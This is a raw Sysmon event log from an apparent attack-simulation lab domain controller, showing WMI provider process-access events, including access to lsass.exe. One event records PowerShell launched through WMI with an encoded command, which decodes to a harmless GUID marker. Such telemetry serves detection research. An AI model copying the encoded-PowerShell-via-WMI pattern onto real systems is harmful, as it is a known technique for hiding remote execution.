16:54:42.717{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1000-00000000AD01}1144C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242304Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.701{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0F00-00000000AD01}1100C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242303Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.701{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0E00-00000000AD01}1076C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242302Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.701{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0D00-00000000AD01}620C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242301Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.701{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0C00-00000000AD01}588C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242300Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.701{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229D-6039-0B00-00000000AD01}852C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242299Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.701{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229D-6039-0900-00000000AD01}792C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 23542300x80000000000000002242298Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.701{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F33801C831495C055CEDBA9EBDADD28B,SHA256=7F57629644F084C07956304AE27A477072A7C433746596AD2C235068BAA3F82F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002242297Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.701{05ADC7E1-29F0-6039-C005-00000000AD01}49443952C:\Windows\system32\csrss.exe{05ADC7E1-6DD2-603E-D1AA-00000000AD01}5496C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002242296Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.701{05ADC7E1-29F0-6039-C005-00000000AD01}49442420C:\Windows\system32\csrss.exe{05ADC7E1-6DD2-603E-D0AA-00000000AD01}7532C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 11241100x80000000000000002242295Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.686{05ADC7E1-6DD2-603E-CEAA-00000000AD01}3944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_kqgsnonu.fuj.ps12021-03-02 16:54:42.686 10341000x80000000000000002242294Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.686{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002242293Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.686{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002242292Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.686{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002242291Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.686{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002242290Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.686{05ADC7E1-229D-6039-0500-00000000AD01}636652C:\Windows\system32\csrss.exe{05ADC7E1-6DD2-603E-D0AA-00000000AD01}7532C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002242289Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.686{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6DD2-603E-D0AA-00000000AD01}7532C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\wbem\cimwin32.dll+3adce|C:\Windows\system32\wbem\cimwin32.dll+3d475|C:\Windows\system32\wbem\cimwin32.dll+3ab15|C:\Windows\system32\wbem\cimwin32.dll+3b393|C:\Windows\system32\wbem\cimwin32.dll+3bb40|C:\Windows\SYSTEM32\framedynos.dll+20256|C:\Windows\SYSTEM32\framedynos.dll+218b5|C:\Windows\system32\wbem\wmiprvse.exe+1704a|C:\Windows\system32\wbem\wmiprvse.exe+1724f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4 154100x80000000000000002242288Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.698{05ADC7E1-6DD2-603E-D0AA-00000000AD01}7532C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEpowershell.exe /NoProfile /Encod VwByAGkAdABlAC0ASABvAHMAdAAgADEAMAA3AGYAZABhAGYAYwAtAGMAYQBmAGUALQA0ADEAMwA4AC0AYgA3AGQANQAtAGQAYgA5ADYANQA3ADAAOQBiADcANgAxAA==C:\Windows\system32\ATTACKRANGE\Administrator{05ADC7E1-29F1-6039-B11D-350000000000}0x351db12HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{05ADC7E1-6D63-603E-6BAA-00000000AD01}6344C:\Windows\System32\wbem\WmiPrvSE.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding 23542300x80000000000000002242287Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.686{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1E7D01AF0B3E60996C683D48D7A95291,SHA256=B4BC5EF70FDDF52B7D58287C524B9616BB0DF5F7126805A3F5B8327F36563F2C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002242286Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.675{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-6DD2-603E-CEAA-00000000AD01}3944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002242285Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.673{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6DD2-603E-CFAA-00000000AD01}13372C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242284Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.673{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6DD2-603E-CEAA-00000000AD01}3944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242283Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.672{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6DD2-603E-CDAA-00000000AD01}12876C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242282Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.671{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6DD2-603E-CCAA-00000000AD01}14264C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242281Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.671{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6DD2-603E-CBAA-00000000AD01}10480C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242280Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 